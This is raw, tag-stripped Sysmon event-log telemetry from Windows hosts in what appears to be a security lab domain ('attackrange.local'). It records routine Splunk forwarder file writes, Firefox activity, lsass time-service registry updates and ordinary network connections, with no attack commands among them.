Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67CB421343837BCBC1E84F1FD5389DEB,SHA256=975514B80EC3099BF2360B68C75E85382250FF729EC3DC8380D4D83AE0A29E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:01.277{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B637CBF556F7F73617771A0260F038,SHA256=D8A43B65D064FBFFA934B1FB5D7F6991F56993BA66A41D6DA92E8D3E17F75042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:02.193{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A76EC07E891C5E9B9F2F088F5475A83,SHA256=3B826D22E563B9E003E2EB90F8932B4D6E1BC5CDF61BA90C59FF2AB4955004CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:02.278{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C34AF4A545238C0CE372593F077074BC,SHA256=132B9424CAF2C71F0A4096A0FDD83A7F010EBA031D9F9A085858C4501D5C2A5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:55.035{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse3.133.117.249ec2-3-133-117-249.us-east-2.compute.amazonaws.com57551-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001054179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:03.293{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B5E6239416738607D39877D39C0CD26,SHA256=07236FEC9380644F2A0C317E73EF61A450E1632F0E1C9B633A533833259FB3FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:03.208{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBEB7068A4B2577B9DE9C7581993477B,SHA256=7F44EC6D56DC1272F02EECEFA1C864DF3230FB07D68CED456AFC075006C25F43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:04.961{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2710B355ACF1566F5215F3D2D5D5AB07,SHA256=E73E535AE6985E9B5D5D712B513D0575968083D676561460F822A56A0C307F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:04.944{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5A6619B1CD1782424E8FB9D288AAC7F3,SHA256=E45ECB5D862BB397A15FE6B6257D8F9C1E44AF4C176EED73A2FB8BC376D3C2EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:04.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1648EA061505663F981A367A0EDDA917,SHA256=A596509B11D7AF1263986C951CE36BA9A866B821703586A206E04D5655756C2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:03.404{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57441-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 13241300x8000000000000000810061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000810060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6eb096) 13241300x8000000000000000810059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0x60c940d5) 13241300x8000000000000000810058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0xc28da8d5) 
13241300x8000000000000000810057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0x245210d5) 13241300x8000000000000000810056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000810055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6eb096) 13241300x8000000000000000810054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0x60c940d5) 13241300x8000000000000000810053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0xc28da8d5) 13241300x8000000000000000810052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0x245210d5) 23542300x8000000000000000810051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:04.208{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0B143A5146969A4FE974AACF2CED9B9,SHA256=030F7706CA8815C7CA02198E61B54306D4C56DFF470286D61E3380B0DAEF743C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:05.343{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BF0687E451F9DA89AD8225AD9D90115,SHA256=9224871714F82AA5DC5A5F857BE6D29B842D0132C1EC0BEC6BA8201ADEB93AD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:05.224{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F44D1C4DE4644F1BACE536473680544,SHA256=CDD71FA8CA5A83122E00B3A861B78E01ECD2F8D69D2B78E902EE7524790F1341,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:57.590{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61943-false10.0.1.12-8000- 23542300x80000000000000001054190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:06.492{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program 
Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:06.445{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001054188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:06.445{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001054187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:06:06.443{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.376.20418646C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001054186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:06:06.442{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.376.20418646C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001054185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:06.377{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32C6BE076E27DCE20610EB2C0AA826E5,SHA256=1CE28DCBA5A4DEA4305284C9D61639760B42122F6F7A63E35CCCD2A6B1CBF111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:06.286{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68981CC1A22FDC9B5283007D1760AF91,SHA256=7E7E691488DB65C86DFFD9EAF0B9BC1F9266124994159AA5E52F136079AC2604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.391{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754D7FA1B8B4DCE1417DFD7972AEDCF6,SHA256=8E0B31490DF06D4112856556DBCF6085CE1D4F61D86B3056265ECE9F90B194A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:07.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0BC59E1E435E18AE230C1327E47E542,SHA256=2E5F5DFD61F977E9595BF26055809DAF0A7720E95946A3C0DD0D48748914FA14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:07.123{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5389932C6EE6313B1544F8E61B2FF4D2,SHA256=E904ABBDBAAC9ADEF817DAADC259BA8E08D8A9A779B6322D98DEF3DAD99211F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=97E8FA966113E3B3FDBF43A8521E8F44,SHA256=C87DF9F346186A5A84506D7C983A3BC9313E000C39F04AE49962853AFAEFA58D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2902FCC49299EDDB2B6FAA18D3995EF2,SHA256=9DC97ACB0AE1AF42784C1AE2F1A770BEAE8D6CB556400CCDE1090277C130FF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7AD758C62FDCA6588C05F5595738FCDB,SHA256=2369D1F9F8F8CA820CBA828ECD67D04D0DCF63B44280735AB07E1630EAB2C4EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2E4FE80A940EFAC2BECBE7AF514861C8,SHA256=4F4F211338974EBDE9A35831A1F4AF427652B31789A680ADD086C365A69CE74C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F72B3F9BAB463E6568B0CCF89F2D6086,SHA256=00BC8ECD09FD68EAB8D8046ACCB45A7E9759F2BBCCE88937C32B5E42EAF59A9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8A70E33666E40458175601450CDF7415,SHA256=04DB1369E66C30336899E81C4DD0C743AF3ACC581B3F77AC562C8C452CDFB7AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DEDDD7FBD546DA45B61DE6BD6AB22426,SHA256=37A963CF53F06A322464922E9C9EBE4085799B704BD438B5586EC70698253753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=91D58B67770C205A78398D9E081F3059,SHA256=E94C82DAF92B51FE3DB77E785C3A7FB5069CF580807E072CBCC60A70D971668E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=97FA1451EE3F72439BD80E77810CA460,SHA256=0DCF658CB38841AE6C229122A22E0A0673839821BA4FAFE16FFF8345ED8623E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E6B0180E0E2CD503E7FF545CED629077,SHA256=50DF1C8418A7BC97B1D8293D8066EA6FEFFB4A4D7F63D9EFFEFD9DBA3D139D39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:08.392{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF605DAAA35032E7BDE3CE76A7BF3173,SHA256=8C5DF48291271173A11B4A4E205C031E4D0684954C979F50DDE44FCF4BD2B900,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:08.333{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D4C235D52D6D3922545D2B8922C4E64,SHA256=5120B63A7CD7466FA2F51AAB8B0F50F753EB6D08C4318DDC47FD99CFB6A98604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:09.411{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E0959801F3D625A06785496F4BAE00A,SHA256=63597A92E14BF54BFC129930B3482E86C0B99D400D9898494D166EFC6D6FA359,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:09.840{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C5A49E61AA47F3F4B57A2F7EDF9491A,SHA256=AC24562F07CB8CCB2A2D47C0D6E1EDCE2246EA5A55E3FC28A639F6E92498EE27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:09.407{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D8E877ACB984997ED0DEFD8A197C37,SHA256=28E0A8847FD87A691D26D18A9D95A68AB8E09D0DF96B9C04B3423D10967CE505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:10.427{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C26B612EE0E2CBD9DBCD31CD4E0122,SHA256=9ABD570BD5C404375901FDD5B6BE763D80C6CF06F499293F66C8546245471642,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:02.704{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61944-false10.0.1.12-8000- 23542300x80000000000000001054207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:10.439{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFE465220C83A6AEF33AEBE003F42512,SHA256=ADE94932E4B8897B40FA6583EBF128BE70222D247D452A789A2CFD04597C91D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:11.489{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
